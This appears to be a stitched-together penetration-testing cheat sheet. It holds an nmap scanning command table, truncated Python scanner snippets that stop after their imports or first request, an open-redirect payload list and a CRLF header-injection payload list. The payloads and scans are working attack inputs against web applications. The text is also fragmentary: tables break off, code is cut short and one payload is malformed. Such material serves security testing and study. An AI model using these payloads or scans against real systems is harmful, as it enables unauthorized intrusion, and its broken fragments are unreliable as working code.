| COMMAND | DESCRIPTION |
| --- | --- |
| nmap -sP 10.0.0.0/24 | Ping scans the network, listing machines that respond to ping. |
| nmap -p 1-65535 -sV -sS -T4 target | Full TCP port scan with service version detection - usually my first scan, I find T4 more accurate than T5 and still "pretty quick". |
| nmap -v -sS -A -T4 target | Prints verbose output, runs stealth SYN scan, T4 timing, OS and version detection + traceroute and scripts against target services. |
| nmap -v -sS -A -T5 target | Prints verbose output, runs stealth SYN scan, T5 timing, OS and version detection + traceroute and scripts against target services. |
| nmap -v -sV -O -sS -T5 target | |
```python
#!/usr/bin/python
'''
# Command line tool for scanning urls for CRLF injection.
'''
import sys, getopt
import requests
import eventlet
from termcolor import colored
```
| //google.com/%2f.. | |
| //[email protected]/%2f.. | |
| ///google.com/%2f.. | |
| ///[email protected]/%2f.. | |
| ////google.com/%2f.. | |
| ////[email protected]/%2f.. | |
| https://google.com/%2f.. | |
| https://[email protected]/%2f.. | |
| /https://google.com/%2f.. | |
| /https://[email protected]/%2f.. |
```python
import requests
import re
import sys
from multiprocessing.dummy import Pool

def robots(host):
    r = requests.get(
        'https://web.archive.org/cdx/search/cdx\
?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host)
```
| %0AHeader-Test:BLATRUC | |
| %0A%20Header-Test:BLATRUC | |
| %20%0AHeader-Test:BLATRUC | |
| %23%OAHeader-Test:BLATRUC | |
| %E5%98%8A%E5%98%8DHeader-Test:BLATRUC | |
| %E5%98%8A%E5%98%8D%0AHeader-Test:BLATRUC | |
| %3F%0AHeader-Test:BLATRUC | |
| crlf%0AHeader-Test:BLATRUC | |
| crlf%0A%20Header-Test:BLATRUC | |
| crlf%20%0AHeader-Test:BLATRUC |